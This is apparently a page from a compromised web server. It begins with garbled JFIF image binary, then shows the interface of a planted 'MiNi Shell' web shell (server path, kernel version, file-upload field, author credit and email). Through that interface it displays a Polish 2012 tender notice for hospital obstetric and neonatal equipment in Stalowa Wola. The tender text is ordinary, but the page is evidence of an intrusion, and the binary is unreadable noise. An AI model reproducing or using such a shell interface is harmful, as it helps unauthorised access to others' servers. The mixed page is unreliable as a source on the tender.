JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121017/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121017/404106-N-2012.html

<p class="kh_header"><b>Stalowa Wola: Dostawa i montaż sprzętu medycznego i wyposażenia dla potrzeb oddziałów: Położniczego i Neonatologicznego Powiatowego Szpitala Specjalistycznego w Stalowej Woli</b><br>
<b>Numer ogłoszenia: 404106 - 2012; data zamieszczenia: 17.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej Powiatowy Szpital Specjalistyczny , ul. Staszica 4, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 8433201, 8433103, 8433397, faks 015 8433201, 8433397.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-stw.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż sprzętu medycznego i wyposażenia dla potrzeb oddziałów: Położniczego i Neonatologicznego Powiatowego Szpitala Specjalistycznego w Stalowej Woli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż sprzętu medycznego i wyposażenia dla potrzeb oddziałów: Położniczego i Neonatologicznego Powiatowego Szpitala Specjalistycznego w Stalowej Woli w ramach zadań:

Zadanie nr 1 - Panele medyczne, kolumny zasilające, lampy operacyjne 
- jednostanowiskowy medyczny panel naścienny , nadłóżkowy dł. max 1700 mm - szt 4 
- dwustanowiskowy  medyczny panel naścienny , nadłóżkowy dł. max 3400 mm  - 8 szt 
- pionowy naścienny panel medyczny - 6 szt 
- podwieszona sufitowa jednostka zasilająca typu Kolumna Chirurgiczna - 1 szt  
- podwieszona sufitowa jednostka zasilająca typu Kolumna do Sali po porodach powikłanych - 1 szt 
- podwieszona sufitowa jednostka zasilająca typu Kolumna Anestezjologiczna - 1 szt   
- lampa operacyjna bezcieniowa sufitowa pojedyncza - 1 szt 
- lampa bezcieniowa zabiegowa , jednoogniskowa , mobilna - 1 szt

Zadanie nr 2 - - Szafa na instrumentarium, regały ze stali kwasoodpornej,myjnie do basenów i kaczek
-szafa wnękowa do przechowywania instrumentarium - szt 1
-myjnia do basenów i kaczek  - 2 szt  
-regał magazynowy ze stali kwasoodpornej  - szt. 3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W przypadku udzielenia zamówień uzupełniających, nie przekraczających 20% wartości zamówienia podstawowego i polegających na rozszerzeniu dostaw, ich realizacja nastąpi na podstawie art. 67 ust. 1 pkt 7 ustawy Prawo zamówień publicznych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie przewiduje się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
A. Spełniają warunki udziału w postępowaniu  zgodnie z dyspozycja art. 22 ust. 1 obowiązującej 
    ustawy Prawo zamówień publicznych (Dz. Ustaw z 2010 roku, Nr 113, poz. 759 z późn. zmianami) tj.
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
   przepisy prawa nakładają obowiązek ich posiadania
2.posiadają wiedzę i doświadczenie 
3.dysponują odpowiednim potencjałem technicznym  oraz osobami zdolnymi do wykonania 
   zamówienia
4.spełniają warunki dotyczące sytuacji ekonomicznej i finansowej 

B. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust 1, pkt 2 ustawy Prawo 
     zamówień publicznych
C. zapewnią dostawę sprzętu objętego zamówieniem dopuszczonego do obrotu zgodnie 
   z prawem polskim i zgodnie z wymogami Zamawiającego w terminie do 6 tygodni od daty 
   podpisania umowy

ponadto
D.
1.zaakceptują płatność za dostarczony  i zamontowany sprzęt w 12 równych ratach, 
      przy czym:
      1)płatność pierwszej raty nastąpi w terminie 30 dni, licząc od daty dostawy , montażu 
         i podpisania przez Zamawiającego protokołu odbioru i dostarczenia Zamawiającemu faktury za
         dostarczony przedmiot zamówienia
      2) kolejne raty płatne będą w terminach 30 dni , licząc od upływu terminu płatności raty 
          poprzedzającej

Sposób oceny spełniania warunków udziału w postępowaniu:
Na potwierdzenie warunku A 1 Wykonawca przedstawia oświadczenie wg wzoru Załącznik nr 3 do SIWZ, 
Na potwierdzenie warunku A 2 Wykonawca przedstawia:
- oświadczenie wg wzoru Załącznik nr 3 do SIWZ, 
Na potwierdzenie Warunku A 3 Wykonawca przedstawia oświadczenie wg Załącznika nr 3 do SIWZ
Warunek C będzie spełniony jeśli Wykonawca przedstawi:
- świadectwa dopuszczenia do stosowania dla oferowanego sprzętu zgodnie 
   z obowiązującą Ustawą o wyrobach medycznych tj. dokumenty potwierdzające, 
   że oferowane urządzenia są zarejestrowane w Polsce jako wyrób medyczny lub posiadają 
   certyfikat CE właściwy dla urządzenia medycznego stwierdzający zgodność z Dyrektywą 
   93/42/ EEC lub odpowiednio atesty PZH i deklaracje producenta, iż proponowany wyrób jest dopuszczony do    stosowania w obiektach służby zdrowia
- opis przedmiotu zamówienia wg Załącznika nr 2 z potwierdzeniem spełniania parametrów
   granicznych, bezwzględnie wymaganych i opisem pozostałych parametrów dotyczących 
   oferowanego sprzętu medycznego 
- dokumenty dotyczące oferowanego sprzętu, potwierdzające spełnianie parametrów 
   granicznych , bezwzględnie wymaganych oraz potwierdzenie parametrów podlegających 
   ocenie punktowej(opisy lub fotografie, opis urządzeń)
oraz 
zobowiąże się do dostawy i montażu oferowanego sprzętu w nieprzekraczalnym terminie  do 6 tygodni od daty zawarcia umowy. Pożądany termin realizacji : 15 grudnia 2012 roku 
Warunek B będzie spełniony jeśli Wykonawca przedstawi w ofercie
- oświadczenie wg Załącznika nr 4 ( w zakresie dot. art. 24 ust. 1 pkt 2)
- kopię aktualnego odpisu z właściwego rejestru, jeśli odrębne przepisy wymagają wpisu do 
  rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2
  ustawy
 
  Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na 
  potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, jest 
  zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do 
  realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie innych podmiotów do 
  oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu 
  zamówienia.
  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej 
  Polskiej, zamiast w/w dokumentu, składa dokument wystawiony w kraju, w którym ma
  siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego 
  likwidacji ani  nie ogłoszono upadłości.
  Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub
  miejsce zamieszkania , nie wydaje się takiego dokumentu, Wykonawca winien je zastąpić 
  dokumentem zawierającym oświadczenie złożone przed notariuszem , właściwym organem 
  sądowym, administracyjnym  albo organem samorządu zawodowego lub gospodarczego 
  odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub 
  miejsce zamieszkania.
  W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę  
  lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamawiający może zwrócić się 
  do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca 
  ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji 
  dotyczących przedłożonego dokumentu.

  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,   
  dokumenty potwierdzające spełnianie warunków udziału w postępowaniu winien spełniać co 
   najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie.  

  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,   
  dokumenty potwierdzające, że Wykonawca nie podlega wykluczeniu składa każdy 
  z Wykonawców oddzielnie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawia:oświadczenie wg wzoru Załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawia:oświadczenie wg wzoru Załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawia:oświadczenie wg wzoru Załącznik nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawia:oświadczenie wg wzoru Załącznik nr 3 do SIWZ, 
Ponadto:
zaakceptuje płatność za dostarczony  i zamontowany sprzęt w 12 równych ratach, 
      przy czym:
      1)płatność pierwszej raty nastąpi w terminie 30 dni, licząc od daty dostawy , montażu 
         i podpisania przez Zamawiającego protokołu odbioru i dostarczenia Zamawiającemu faktury za
         dostarczony przedmiot zamówienia
      2) kolejne raty płatne będą w terminach 30 dni , licząc od upływu terminu płatności raty 
          poprzedzającej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1Wypełniony i podpisany formularz oferty wg załączonego w SIWZ wzoru 
2Specyfikacja cenowa, zgodnie z Rozdz. II SIWZ wg Załącznika nr 2 do SIWZ
3Opis przedmiotu zamówienia wg Załącznika nr 1 do SIWZ z potwierdzeniem spełniania parametrów granicznych, bezwzględnie wymaganych i opisem pozostałych parametrów dla oferowanego sprzętu medycznego 
4.2.1Świadectwa dopuszczenia do stosowania dla oferowanego sprzętu zgodnie 
       z obowiązującą Ustawą o wyrobach medycznych tj. dokumenty potwierdzające, że 
       oferowane urządzenia są zarejestrowane w Polsce jako wyrób medyczny lub posiadają 
       certyfikat CE właściwy dla urządzenia medycznego stwierdzający zgodność z Dyrektywą 
       93/42/ EEC  lub odpowiednio świadectwa PZH,  deklaracje producenta</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-stw.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej
Powiatowy Szpital Specjalistyczny w Stalowej Woli
37 - 450 Stalowa Wola ul. Staszica 4 
Dział Zamówień Publicznych pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2012 godzina 11:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej
Powiatowy Szpital Specjalistyczny w Stalowej Woli
37 - 450 Stalowa Wola ul. Staszica 4 
Dział Zamówień Publicznych pok. nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji przedmiotu zamówienia: do 6 tygodni od daty zawarcia umowy. Pożądany termin 
      realizacji: 15 grudnia 2012 roku.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com